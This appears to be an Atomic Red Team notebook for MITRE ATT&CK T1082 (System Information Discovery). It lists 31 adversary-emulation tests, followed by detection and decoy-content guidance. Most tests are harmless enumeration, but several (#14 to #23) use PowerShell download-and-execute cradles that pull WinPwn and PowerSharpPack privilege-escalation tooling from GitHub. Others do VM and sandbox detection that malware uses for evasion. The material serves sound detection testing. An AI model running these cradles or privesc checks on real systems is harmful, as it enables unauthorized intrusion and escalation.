# T1082 - System Information Discovery
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the <code>systemsetup</code> configuration tool on macOS. As an example, adversaries with user-level access can execute the <code>df -aH</code> command to obtain currently mounted disks and associated freely available space. Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather detailed system information (e.g. <code>show version</code>).(Citation: US-CERT-TA18-106A) [System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)

Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)

## Atomic Tests

### Atomic Test #1 - System Information DiscoveryIdentify System Info. Upon execution, system info and time info will be displayed.
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
systeminfo
reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 1

### Atomic Test #2 - System Information DiscoveryIdentify System Info
**Supported Platforms:** macos#### Attack Commands: Run with `sh`
```sh
system_profiler
ls -al /Applications
```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 2

### Atomic Test #3 - List OS InformationIdentify System Info
**Supported Platforms:** linux, macos#### Attack Commands: Run with `sh`
```sh
uname -a >> /tmp/T1082.txt
if [ -f /etc/lsb-release ]; then cat /etc/lsb-release >> /tmp/T1082.txt; fi
if [ -f /etc/redhat-release ]; then cat /etc/redhat-release >> /tmp/T1082.txt; fi   
if [ -f /etc/issue ]; then cat /etc/issue >> /tmp/T1082.txt; fi
if [ -f /etc/os-release ]; then cat /etc/os-release >> /tmp/T1082.txt; fi
uptime >> /tmp/T1082.txt
cat /tmp/T1082.txt 2>/dev/null
```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 3

#### Cleanup: 
```sh
rm /tmp/T1082.txt 2>/dev/null
```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 3 -Cleanup

### Atomic Test #4 - Linux VM Check via HardwareIdentify virtual machine hardware. This technique is used by the Pupy RAT and other malware.
**Supported Platforms:** linux
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `bash`
```bash
if [ -f /sys/class/dmi/id/bios_version ]; then cat /sys/class/dmi/id/bios_version | grep -i amazon; fi
if [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware"; fi
if [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU"; fi
if [ -x "$(command -v dmidecode)" ]; then sudo dmidecode | grep -i "microsoft\|vmware\|virtualbox\|quemu\|domu"; fi
if [ -f /proc/scsi/scsi ]; then cat /proc/scsi/scsi | grep -i "vmware\|vbox"; fi
if [ -f /proc/ide/hd0/model ]; then cat /proc/ide/hd0/model | grep -i "vmware\|vbox\|qemu\|virtual"; fi
if [ -x "$(command -v lspci)" ]; then sudo lspci | grep -i "vmware\|virtualbox"; fi
if [ -x "$(command -v lscpu)" ]; then sudo lscpu | grep -i "Xen\|KVM\|Microsoft"; fi
```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 4

### Atomic Test #5 - Linux VM Check via Kernel ModulesIdentify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware.
**Supported Platforms:** linux#### Attack Commands: Run with `bash`
```bash
sudo lsmod | grep -i "vboxsf\|vboxguest"
sudo lsmod | grep -i "vmw_baloon\|vmxnet"
sudo lsmod | grep -i "xen-vbd\|xen-vnif"
sudo lsmod | grep -i "virtio_pci\|virtio_net"
sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 5

### Atomic Test #6 - FreeBSD VM Check via Kernel ModulesIdentify virtual machine host kernel modules.
**Supported Platforms:** linux#### Attack Commands: Run with `sh`
```sh
kldstat | grep -i "vmm"
kldstat | grep -i "vbox"
```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 6

### Atomic Test #7 - Hostname Discovery (Windows)Identify system hostname for Windows. Upon execution, the hostname of the device will be displayed.
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
hostname
```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 7

### Atomic Test #8 - Hostname DiscoveryIdentify system hostname for FreeBSD, Linux and macOS systems.
**Supported Platforms:** linux, macos#### Attack Commands: Run with `sh`
```sh
hostname
```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 8

### Atomic Test #9 - Windows MachineGUID DiscoveryIdentify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry.
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 9

### Atomic Test #10 - Griffon Recon
This script emulates the reconnaissance script seen in used by Griffon and was modified by security researcher Kirk Sayre 
in order simply print the recon results to the screen as opposed to exfiltrating them. [Script](https://gist.github.com/kirk-sayre-work/7cb5bf4e2c7c77fa5684ddc17053f1e5).  
For more information see also [https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon](https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon) and [https://attack.mitre.org/software/S0417/](https://attack.mitre.org/software/S0417/)
**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Sample script file must exist on disk at specified location (#{vbscript})

##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\T1082\src\griffon_recon.vbs") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1082\src\griffon_recon.vbs") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1082/src/griffon_recon.vbs" -OutFile "PathToAtomicsFolder\T1082\src\griffon_recon.vbs"

```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 10 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
cscript "PathToAtomicsFolder\T1082\src\griffon_recon.vbs"
```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 10

### Atomic Test #11 - Environment variables discovery on windowsIdentify all environment variables. Upon execution, environments variables and your path info will be displayed.
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
set
```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 11

### Atomic Test #12 - Environment variables discovery on freebsd, macos and linuxIdentify all environment variables. Upon execution, environments variables and your path info will be displayed.
**Supported Platforms:** linux, macos#### Attack Commands: Run with `sh`
```sh
env
```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 12

### Atomic Test #13 - Show System Integrity Protection status (MacOS)Read and Display System Intergrety Protection status. csrutil is commonly used by malware and post-exploitation tools to determine whether certain files and directories on the system are writable or not.
**Supported Platforms:** macos#### Attack Commands: Run with `sh`
```sh
csrutil status
```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 13

### Atomic Test #14 - WinPwn - winPEASDiscover Local Privilege Escalation possibilities using winPEAS function of WinPwn**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
winPEAS -noninteractive -consoleoutput```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 14

### Atomic Test #15 - WinPwn - itm4nprivescDiscover Local Privilege Escalation possibilities using itm4nprivesc function of WinPwn**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
itm4nprivesc -noninteractive -consoleoutput```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 15

### Atomic Test #16 - WinPwn - Powersploits privesc checksPowersploits privesc checks using oldchecks function of WinPwn**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
oldchecks -noninteractive -consoleoutput```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 16

#### Cleanup: 
```powershell
rm -force -recurse .\DomainRecon -ErrorAction Ignore
rm -force -recurse .\Exploitation -ErrorAction Ignore
rm -force -recurse .\LocalPrivEsc -ErrorAction Ignore
rm -force -recurse .\LocalRecon -ErrorAction Ignore
rm -force -recurse .\Vulnerabilities -ErrorAction Ignore```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 16 -Cleanup

### Atomic Test #17 - WinPwn - General privesc checksGeneral privesc checks using the otherchecks function of WinPwn**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
otherchecks -noninteractive -consoleoutput```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 17

### Atomic Test #18 - WinPwn - GeneralReconCollect general computer informations via GeneralRecon function of WinPwn**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Generalrecon -consoleoutput -noninteractive```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 18

### Atomic Test #19 - WinPwn - MorereconGathers local system information using the Morerecon function of WinPwn**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Morerecon -noninteractive -consoleoutput```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 19

### Atomic Test #20 - WinPwn - RBCD-CheckSearch for Resource-Based Constrained Delegation attack paths using RBCD-Check function of WinPwn**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
RBCD-Check -consoleoutput -noninteractive```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 20

### Atomic Test #21 - WinPwn - PowerSharpPack - Watson searching for missing windows patchesPowerSharpPack - Watson searching for missing windows patches  technique via function of WinPwn**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpWatson.ps1')
Invoke-watson```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 21

### Atomic Test #22 - WinPwn - PowerSharpPack - Sharpup checking common Privesc vectorsPowerSharpPack - Sharpup checking common Privesc vectors technique via function of WinPwn - Takes several minutes to complete.**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1')
Invoke-SharpUp -command "audit"```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 22

### Atomic Test #23 - WinPwn - PowerSharpPack - SeatbeltPowerSharpPack - Seatbelt technique via function of WinPwn.

[Seatbelt](https://github.com/GhostPack/Seatbelt) is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')
Invoke-Seatbelt -Command "-group=all"; pause```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 23

### Atomic Test #24 - Azure Security Scan with SkyArk
Upon successful execution, this test will utilize a valid read-only Azure AD user's credentials to conduct a security scan and determine what users exist in a given tenant, as well as identify any admin users. 
Once the test is complete, a folder will be output to the temp directory that contains 3 csv files which provide info on the discovered users. 
See https://github.com/cyberark/SkyArk 

**Supported Platforms:** azure-ad

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: The SkyArk AzureStealth module must exist in PathToAtomicsFolder\..\ExternalPayloads.

##### Check Prereq Commands:
```powershell
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\AzureStealth.ps1"){exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
invoke-webrequest "https://raw.githubusercontent.com/cyberark/SkyArk/3293ee145e95061a8980dd7b5da0030edc4da5c0/AzureStealth/AzureStealth.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\AzureStealth.ps1"

```
##### Description: The AzureAD module must be installed.

##### Check Prereq Commands:
```powershell
try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}

```
##### Get Prereq Commands:
```powershell
Install-Module -Name AzureAD -Force

```
##### Description: The Az module must be installed.

##### Check Prereq Commands:
```powershell
try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}

```
##### Get Prereq Commands:
```powershell
Install-Module -Name Az -Force

```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 24 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Import-Module "PathToAtomicsFolder\..\ExternalPayloads\AzureStealth.ps1" -force      
$Password = ConvertTo-SecureString -String "T1082Az" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "None", $Password
Connect-AzAccount -Credential $Credential
Connect-AzureAD -Credential $Credential
Scan-AzureAdmins -UseCurrentCred
```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 24

#### Cleanup: 
```powershell
$resultstime = Get-Date -Format "yyyyMMdd"
$resultsfolder = ("Results-" + $resultstime)
remove-item $env:temp\$resultsfolder -recurse -force -erroraction silentlycontinue
```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 24 -Cleanup

### Atomic Test #25 - Linux List Kernel ModulesEnumerate kernel modules installed 3 different ways. Upon successful execution stdout will display kernel modules installed on host 2 times, followed by list of modules matching 'vmw' if present.
**Supported Platforms:** linux#### Attack Commands: Run with `sh`
```sh
lsmod
kmod list
grep vmw /proc/modules
```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 25

### Atomic Test #26 - FreeBSD List Kernel ModulesEnumerate kernel modules loaded. Upon successful execution stdout will display kernel modules loaded, followed by list of modules matching 'vmm' if present.
**Supported Platforms:** linux#### Attack Commands: Run with `sh`
```sh
kldstat
kldstat | grep vmm
```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 26

### Atomic Test #27 - System Information Discovery with WMICIdentify system information with the WMI command-line (WMIC) utility. Upon execution, various system information will be displayed, including: OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, and GPU driver products/versions.
https://nwgat.ninja/getting-system-information-with-wmic-on-windows/
Elements of this test were observed in the wild used by Aurora Stealer in late 2022 and early 2023, as highlighted in public reporting:
https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar
https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
wmic cpu get name
wmic MEMPHYSICAL get MaxCapacity
wmic baseboard get product
wmic baseboard get version
wmic bios get SMBIOSBIOSVersion
wmic path win32_VideoController get name
wmic path win32_VideoController get DriverVersion
wmic path win32_VideoController get VideoModeDescription
wmic OS get Caption,OSArchitecture,Version
wmic DISKDRIVE get Caption
Get-WmiObject win32_bios
```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 27

### Atomic Test #28 - Driver Enumeration using DriverQueryExecutes the driverquery command to list drivers installed on the system. Adversaries utilize the feature to enumerate the driver and it can be
used for Exploitation. 
command /v - provide verbose output but not valid for signed drivers
        /si - provide information about signed drivers 
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
driverquery /v
driverquery /si
```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 28

### Atomic Test #29 - System Information DiscoveryThe script gathernetworkinfo.vbs is employed to collect system information such as the operating system, DNS details, firewall configuration, etc. Outputs are stored in c:\Windows\System32\config or c:\Windows\System32\reg. https://www.verboon.info/2011/06/the-gathernetworkinfo-vbs-script/
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
wscript.exe C:\Windows\System32\gatherNetworkInfo.vbs
```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 29

### Atomic Test #30 - Check computer locationLooks up country code configured in the registry, likely geofence. Upon execution, country code info will be displayed.
- https://tria.ge/210111-eaz8mqhgh6/behavioral1
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
reg query "HKEY_CURRENT_USER\Control Panel\International\Geo"
```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 30

### Atomic Test #31 - BIOS Information Discovery through RegistryLooks up for BIOS information in the registry. BIOS information is often read in order to detect sandboxing environments.  Upon execution, BIOS information will be displayed.
- https://tria.ge/210111-eaz8mqhgh6/behavioral1
- https://evasions.checkpoint.com/techniques/registry.html
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
reg query HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System /v SystemBiosVersion
reg query HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System /v VideoBiosVersion
```

In [ ]:
Invoke-AtomicTest T1082 -TestNumbers 31

## Detection
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.

Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to gather  detailed system information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).

In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations.


## Shield Active Defense
### Decoy Content  
 Seed content that can be used to lead an adversary in a specific direction, entice a behavior, etc. 

 Decoy Content is the data used to tell a story to an adversary. This content can be legitimate or synthetic data which is used to reinforce or validate your defensive strategy. Examples of decoy content are files on a storage object, entries in the system registry, system shortcuts, etc.
#### Opportunity
There is an opportunity to feed content to an adversary to influence their behaviors, test their interest in specific topics, or add legitimacy to a system or environment.
#### Use Case
A defender can use decoy content to give the false impression about the system when an adversary performs system information discovery.
#### Procedures
Create directories and files with names and contents using key words that may be relevant to an adversary to see if they examine or exfiltrate the data.
Seed a file system with content that is of no value to the company but reinforces the legitimacy of the system if viewed by an adversary.
